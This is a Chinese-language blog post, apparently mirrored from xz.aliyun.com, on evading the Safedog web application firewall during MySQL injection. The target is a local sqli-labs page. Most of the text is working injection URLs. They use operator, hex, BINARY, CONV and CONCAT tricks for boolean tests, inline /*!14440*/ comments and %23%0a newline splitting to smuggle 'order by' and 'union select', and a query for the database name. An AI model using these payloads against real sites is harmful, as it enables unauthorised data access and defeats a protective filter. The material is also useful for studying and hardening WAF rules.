Bypass Mysql Safedog
2019-10-19 11:20:02 Author: xz.aliyun.com(查看原文) 阅读量:209 收藏

跟团队小伙伴一起日狗

安全狗不让基本运算符后跟数字字符串

特殊运算符绕

http://172.16.1.157/sql/Less-1/?id=1'and -1=-1 -- + 正常
http://172.16.1.157/sql/Less-1/?id=1'and -1=-2 -- + 不正常
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~1 -- + 正常
http://172.16.1.157/sql/Less-1/?id=1'and ~1=~2 -- + 不正常

16进制绕

http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x1-- +    正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <> 0x0-- +    不正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x0-- +   正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 <=> 0x1-- +   不正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x1-- +   正常
http://172.16.1.157/sql/Less-1/?id=1' and 0x0 xor 0x0-- +   不正常

BINARY绕

http://172.16.1.157/sql/Less-1/?id=1' and BINARY 1-- +  正常
http://172.16.1.157/sql/Less-1/?id=1' and BINARY 0-- +  不正常

conv()函数绕

http://172.16.1.157/sql/Less-1/?id=1' and CONV(1,11,2)-- +  正常
http://172.16.1.157/sql/Less-1/?id=1' and CONV(0,11,2)-- +  不正常

concat()函数绕

http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(1)-- +     正常
http://172.16.1.157/sql/Less-1/?id=1' and CONCAT(0)-- +     不正常

绕order by

内联

http://172.16.1.157/sql/Less-1/?id=1'/*!14440order by*/ 3 -- +

注释换行

http://172.16.1.157/sql/Less-1/?id=1'order%23%0aby 3 -- +

关键在于打乱union select

内联

http://172.16.1.157/sql/Less-1/?id=-1' /*!14440union*//*!14440select */1,2,3 -- +

注释后跟垃圾字符换行

http://172.16.1.157/sql/Less-1/?id=-1'union%23hhh%0aselect 1,2,3--+

union distinct | distinctrow | all

http://172.16.1.157/sql/Less-1/?id=-1' union distinct %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union distinctrow %23%0aselect 1,2,3 -- +
http://172.16.1.157/sql/Less-1/?id=-1' union all%23%0aselect 1,2,3 -- +

接下来是查数据,我在这使用注释垃圾字符换行也就是%23a%0a的方法来绕,你可以用上面说的/*!14440*/内联

查数据库名

http://172.16.1.157/sql/Less-1/?id=-1' union %23chabug%0a select 1,database%23%0a(%0a),3 -- +

查表名 安全狗4.0默认没开information_schema防护的时候可以过,开了information_schema防护之后绕不过去,哭唧唧


文章来源: http://xz.aliyun.com/t/6545
如有侵权请联系:admin#unsafe.sh